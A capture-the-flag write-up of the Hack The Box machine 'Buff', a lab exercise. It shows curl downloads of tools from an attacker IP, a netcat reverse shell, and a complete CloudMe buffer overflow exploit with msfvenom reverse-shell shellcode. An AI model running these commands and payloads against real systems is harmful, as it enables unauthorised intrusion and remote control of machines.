The first thing that might come into your mind when seeing the machine name is a Buffer Overflow. If that is the case, you just guessed the procedure to obtain root on this machine. Using an exploit to gain a webshell on this Windows Server is the starting point for running the CloudMe Buffer Overflow attack for root.
[0x1] Reconnaissance & Enumeration
Let's see if we can find some open ports and services as a starting point. Port 7680 does not appear to have any function, but 8080 serves a website. Buff is a Windows machine but uses Apache to serve the website, so it will probably run something like WAMP/XAMPP.
nmap -sV -sC -p- -oA nmap_allports 10.10.10.198
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 07:47 EDT
Nmap scan report for buff (10.10.10.198)
Host is up (0.023s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 270.15 seconds
Port 8080 runs the Gym Management System 1.0. The website itself does not show any interesting information.
[0x2] Initial Foothold
A quick check to see if there might be a known vulnerability I can use with Searchsploit. It finds an Unauthenticated Remote Code Execution vulnerability. Nice!
searchsploit gym
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      |  Path
------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution   | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                              | php/webapps/42801.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I grab the file on my machine and find out that you only need to run the script with the URL of the Gym Management System as a parameter. It does require Python 2, which my new Kali install does not like. To speed things up I switch to my Parrot machine, which still has support for Python 2.
python 48506.py http://10.10.10.198:8080/
When the exploit runs it will try to launch the webshell and give you a limited shell to run commands. The exploit is successful and I have a shell as the user Shaun.
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU=====================" 
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
buff\shaun
Since the limited shell is not the easiest way to communicate, I download Netcat for Windows onto the machine to launch a full shell. I have Netcat on my attacker machine and serve it via a quick Python webserver.
python -m SimpleHTTPServer 1337
I then use Curl to download the file from my local webserver to the machine.
curl http://10.10.14.64:1337/nc.exe -o nc.exe
Before running Netcat I start a listener on my local machine for the incoming connection.
netcat -lvnp 9001
With the listener running it's time to start Netcat and get myself a full shell on Buff.
nc.exe 10.10.14.64 9001 -e cmd.exe
Mission accomplished, the reverse shell is connected without any hassle.
listening on [any] 9001 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
[0x3] Path to User flag
The path to the User flag is not so much a path as a simple directory change and reading a text file.
 Directory of C:\Users\shaun\Desktop

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
03/09/2020  16:03                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   8,861,081,600 bytes free
The expected file, in the expected location. I got myself a User flag!
C:\Users\shaun\Desktop>type user.txt
type user.txt
e6f2c0554599c57df16e0f741afc6321
[0x4] Path to Root flag
The machine does not really contain anything special besides the XAMPP installation. I enumerated this folder a bit but did not find any useful information. In the home directory of Shaun I did notice a file in the Downloads folder called CloudMe 1.11.2.
 Directory of C:\Users\shaun\Downloads

03/09/2020  16:22    <DIR>          .
03/09/2020  16:22    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
03/09/2020  16:04            59,392 nc.exe
               2 File(s)     17,890,216 bytes
               2 Dir(s)   8,801,017,856 bytes free
I did a quick check using Searchsploit and found a CloudMe 1.11.2 - Buffer Overflow exploit. Since the machine is called Buff, this does make sense.
searchsploit CloudMe
------------------------------------------------------------- ---------------------------------
 Exploit Title                                                |  Path
------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)               | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)              | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)       | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)| windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt               | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)      | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                       | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)    | windows_x86-64/remote/44784.py
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The script has to run on the victim machine and targets port 8888 on localhost. The issue here is that Python is not installed on the machine, so running the script there will not work. Someone hinted at using Plink and I checked it out further. Plink can be used to forward traffic from your own machine to the victim: it creates an SSH connection from the machine back to your attacker machine, and over that connection a port on your side can be tunnelled to a port on the victim.
Time to download Plink from my machine using Curl.
curl http://10.10.14.64:1337/plink.exe -o plink.exe
Let's start Plink and create the port forwarding.
C:\xampp\htdocs\gym\upload>plink.exe -l d0p4m1n3 -pw password 10.10.14.64 -R 8888:127.0.0.1:8888
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 88:c2:f9:ac:d1:3e:14:26:1e:64:45:31:56:ef:89:5e
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Using username "d0p4m1n3".
Linux parrot 5.4.0-4parrot1-amd64 #1 SMP Parrot 5.4.19-4parrot1 (2020-02-27) x86_64

The programs included with the Parrot GNU/Linux are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Using MsfVenom I generate the Python payload for our Buffer Overflow exploit script. The payload is different from the one in the standard exploit file because I want it to launch a reverse shell instead of calc.exe.
msfvenom -p windows/exec CMD='c:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.64 8443' -b '\x00\x0A\x0D' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1334 bytes
buf =  b""
buf += b"\xbe\x16\x92\xb5\xb5\xd9\xc3\xd9\x74\x24\xf4\x5f\x31"
buf += b"\xc9\xb1\x3e\x83\xef\xfc\x31\x77\x10\x03\x77\x10\xf4"
buf += b"\x67\x49\x5d\x7a\x87\xb2\x9e\x1a\x01\x57\xaf\x1a\x75"
buf += b"\x13\x80\xaa\xfd\x71\x2d\x41\x53\x62\xa6\x27\x7c\x85"
buf += b"\x0f\x8d\x5a\xa8\x90\xbd\x9f\xab\x12\xbf\xf3\x0b\x2a"
buf += b"\x70\x06\x4d\x6b\x6c\xeb\x1f\x24\xfb\x5e\xb0\x41\xb1"
buf += b"\x62\x3b\x19\x54\xe3\xd8\xea\x57\xc2\x4e\x60\x0e\xc4"
buf += b"\x71\xa5\x3b\x4d\x6a\xaa\x01\x07\x01\x18\xfe\x96\xc3"
buf += b"\x50\xff\x35\x2a\x5d\xf2\x44\x6a\x5a\xec\x32\x82\x98"
buf += b"\x91\x44\x51\xe2\x4d\xc0\x42\x44\x06\x72\xaf\x74\xcb"
buf += b"\xe5\x24\x7a\xa0\x62\x62\x9f\x37\xa6\x18\x9b\xbc\x49"
buf += b"\xcf\x2d\x86\x6d\xcb\x76\x5d\x0f\x4a\xd3\x30\x30\x8c"
buf += b"\xbc\xed\x94\xc6\x51\xfa\xa4\x84\x3f\xfd\x3b\xb3\x72"
buf += b"\xfd\x43\xbc\x22\x95\x72\x37\xad\xe2\x8a\x92\x89\x1c"
buf += b"\xc1\xbf\xb8\xb4\x8c\x55\xf9\xd9\x2e\x80\x3e\xe7\xac"
buf += b"\x21\xbf\x1c\xac\x43\xba\x59\x6a\xbf\xb6\xf2\x1f\xbf"
buf += b"\x65\xf3\x35\xdc\xb3\x57\xce\x42\xa9\x17\x5e\xd9\x59"
buf += b"\xa3\xfa\x8e\xfa\x38\x5f\x36\x84\xd3\x03\xcd\x06\x47"
buf += b"\xd3\x4c\x83\xcb\x45\xec\x65\x96\xe1\x97\x59\x75\x77"
buf += b"\x78\xf9\xe8\x13\x56\x98\x8a\xbe\x86\x53\x5a\x6f\xf6"
buf += b"\xa3\xb4\x5e\xcc\xed\xfe\x94\x0c\xca\xca\xe0\x7f\x2a"
With the payload replaced by the newly generated one, the complete script looks like this:
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

# Instructions:
# Start the CloudMe service and run the script.

import socket

# CloudMe listens on localhost; on this box 127.0.0.1:8888 is the Plink-forwarded port
target = "127.0.0.1"

padding1 = b"\x90" * 1052                 # filler up to the saved return address
EIP = b"\xB5\x42\xA8\x68"                 # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30                       # NOP sled that ESP points into after the RET

# Payload regenerated for this box (reverse shell via nc.exe instead of calc.exe):
# msfvenom -p windows/exec CMD='c:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.64 8443' -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xbe\x16\x92\xb5\xb5\xd9\xc3\xd9\x74\x24\xf4\x5f\x31"
payload += b"\xc9\xb1\x3e\x83\xef\xfc\x31\x77\x10\x03\x77\x10\xf4"
payload += b"\x67\x49\x5d\x7a\x87\xb2\x9e\x1a\x01\x57\xaf\x1a\x75"
payload += b"\x13\x80\xaa\xfd\x71\x2d\x41\x53\x62\xa6\x27\x7c\x85"
payload += b"\x0f\x8d\x5a\xa8\x90\xbd\x9f\xab\x12\xbf\xf3\x0b\x2a"
payload += b"\x70\x06\x4d\x6b\x6c\xeb\x1f\x24\xfb\x5e\xb0\x41\xb1"
payload += b"\x62\x3b\x19\x54\xe3\xd8\xea\x57\xc2\x4e\x60\x0e\xc4"
payload += b"\x71\xa5\x3b\x4d\x6a\xaa\x01\x07\x01\x18\xfe\x96\xc3"
payload += b"\x50\xff\x35\x2a\x5d\xf2\x44\x6a\x5a\xec\x32\x82\x98"
payload += b"\x91\x44\x51\xe2\x4d\xc0\x42\x44\x06\x72\xaf\x74\xcb"
payload += b"\xe5\x24\x7a\xa0\x62\x62\x9f\x37\xa6\x18\x9b\xbc\x49"
payload += b"\xcf\x2d\x86\x6d\xcb\x76\x5d\x0f\x4a\xd3\x30\x30\x8c"
payload += b"\xbc\xed\x94\xc6\x51\xfa\xa4\x84\x3f\xfd\x3b\xb3\x72"
payload += b"\xfd\x43\xbc\x22\x95\x72\x37\xad\xe2\x8a\x92\x89\x1c"
payload += b"\xc1\xbf\xb8\xb4\x8c\x55\xf9\xd9\x2e\x80\x3e\xe7\xac"
payload += b"\x21\xbf\x1c\xac\x43\xba\x59\x6a\xbf\xb6\xf2\x1f\xbf"
payload += b"\x65\xf3\x35\xdc\xb3\x57\xce\x42\xa9\x17\x5e\xd9\x59"
payload += b"\xa3\xfa\x8e\xfa\x38\x5f\x36\x84\xd3\x03\xcd\x06\x47"
payload += b"\xd3\x4c\x83\xcb\x45\xec\x65\x96\xe1\x97\x59\x75\x77"
payload += b"\x78\xf9\xe8\x13\x56\x98\x8a\xbe\x86\x53\x5a\x6f\xf6"
payload += b"\xa3\xb4\x5e\xcc\xed\xfe\x94\x0c\xca\xca\xe0\x7f\x2a"

# pad the request out to a fixed 1500 bytes
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
    s.close()
except Exception as e:
    # the original printed sys.exc_value, which is Python 2 only and sys was never imported
    print(e)
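To make the layout of that request explicit, here is an added example (not part of the original writeup or of the 48389.py PoC) that models the buffer with the page's constants and checks the invariants the PoC depends on: where the four EIP bytes land, that ESP points at the NOP sled right after the RET, that the total is 1500 bytes, and that neither the gadget address nor the payload contains a byte from the -b bad-char list. The payload it uses is a constructed stand-in of the same length, not shellcode.

```python
# Added example: models the overflow layout from the PoC above and checks its invariants.
# Constants come from the PoC; the payload passed in is a constructed stand-in, not shellcode.

BAD_CHARS = b"\x00\x0a\x0d"          # the -b list handed to msfvenom
PADDING_LEN = 1052                   # bytes of filler before the saved return address
RET_ADDR = 0x68A842B5                # PUSH ESP; RET gadget used by the PoC
NOP_SLED_LEN = 30
TOTAL_LEN = 1500                     # the PoC pads every request to this size


def ret_bytes(addr: int) -> bytes:
    """Little-endian encoding of a 32-bit address, as it must appear in the buffer."""
    return addr.to_bytes(4, "little")


def has_bad_chars(blob: bytes, bad: bytes = BAD_CHARS) -> bool:
    """True if any byte of blob is one the encoder was told to avoid."""
    return any(b in bad for b in blob)


def layout(payload: bytes) -> dict:
    """Build the buffer the same way the PoC does and report where each region sits."""
    eip = ret_bytes(RET_ADDR)
    nops = b"\x90" * NOP_SLED_LEN
    overrun_len = TOTAL_LEN - (PADDING_LEN + NOP_SLED_LEN + len(eip) + len(payload))
    if overrun_len < 0:
        raise ValueError("payload does not fit in the %d-byte buffer" % TOTAL_LEN)
    buf = b"\x90" * PADDING_LEN + eip + nops + payload + b"C" * overrun_len
    return {
        "eip_offset": PADDING_LEN,
        # After RET pops our address, ESP points just past it: that is the NOP sled,
        # which is why PUSH ESP; RET lands execution in the sled and then the payload.
        "esp_after_ret": PADDING_LEN + len(eip),
        "payload_offset": PADDING_LEN + len(eip) + NOP_SLED_LEN,
        "overrun_len": overrun_len,
        "total": len(buf),
        "eip_bytes_in_buf": buf[PADDING_LEN:PADDING_LEN + 4],
        "gadget_clean": not has_bad_chars(eip),
        "payload_clean": not has_bad_chars(payload),
    }


if __name__ == "__main__":
    # Constructed stand-in with the 273-byte length msfvenom reported (not shellcode).
    fake_payload = b"\xcc" * 273
    for key, value in layout(fake_payload).items():
        print(key, value)
```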
Before running the script I need to launch another listener. The port is the one used when generating the payload with MsfVenom, 8443.
netcat -lvnp 8443
Let's launch the Python script, which connects to local port 8888 and is forwarded by Plink to port 8888 on the Buff machine.
python 48389.py
And it's connected! The reverse connection was initiated from Buff to my machine, indicating that the payload ran without interruption. A quick check using whoami shows that the shell runs as Administrator.
listening on [any] 8443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>hostname
hostname
BUFF
Last but not least, the root flag to officially mark this box as rooted.
C:\Windows\system32>type c:\users\administrator\desktop\root.txt
9d5ab2de5c3175ae7a72093b61f0e580
All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!